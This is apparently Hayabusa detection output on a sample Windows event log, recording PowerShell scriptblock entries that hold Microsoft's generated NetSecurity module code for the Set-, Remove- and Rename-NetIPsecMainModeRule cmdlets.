Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 